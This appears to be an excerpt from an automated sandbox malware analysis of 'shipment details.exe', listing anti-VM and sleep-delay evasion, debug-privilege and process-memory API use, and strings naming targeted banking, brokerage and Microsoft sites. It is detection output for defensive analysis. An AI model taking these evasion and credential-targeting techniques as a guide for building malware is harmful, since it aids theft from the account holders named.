Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR

Source: C:\Users\user\Desktop\shipment details.exe	Memory allocated: CF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Memory allocated: 2AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Memory allocated: 28D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Memory allocated: 4DA0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599224	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598856	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598732	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597745	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597415	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596326	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 594578	Jump to behavior

Source: C:\Users\user\Desktop\shipment details.exe	Window / User API: threadDelayed 2008			Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Window / User API: threadDelayed 7806			Jump to behavior

Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 2672	Thread sleep count: 2008 > 30	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 2672	Thread sleep count: 7806 > 30	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -599224s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -598968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -598856s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -598732s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -598187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -597968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -597859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -597745s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -597640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -597415s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -596546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -596326s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -596218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220	Thread sleep time: -594578s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599224	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598856	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598732	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597745	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597415	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596326	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Thread delayed: delay time: 594578	Jump to behavior

Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce87960e4dfa2<
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: shipment details.exe, 00000001.00000002.4518709296.0000000001126000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\shipment details.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\shipment details.exe

Code function: 1_2_06BD9548 LdrInitializeThunk,

1_2_06BD9548

Source: C:\Users\user\Desktop\shipment details.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\shipment details.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.shipment details.exe.2b27b10.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)

Source: C:\Users\user\Desktop\shipment details.exe

Process created: C:\Users\user\Desktop\shipment details.exe "C:\Users\user\Desktop\shipment details.exe"

Jump to behavior

Source: C:\Users\user\Desktop\shipment details.exe	Queries volume information: C:\Users\user\Desktop\shipment details.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
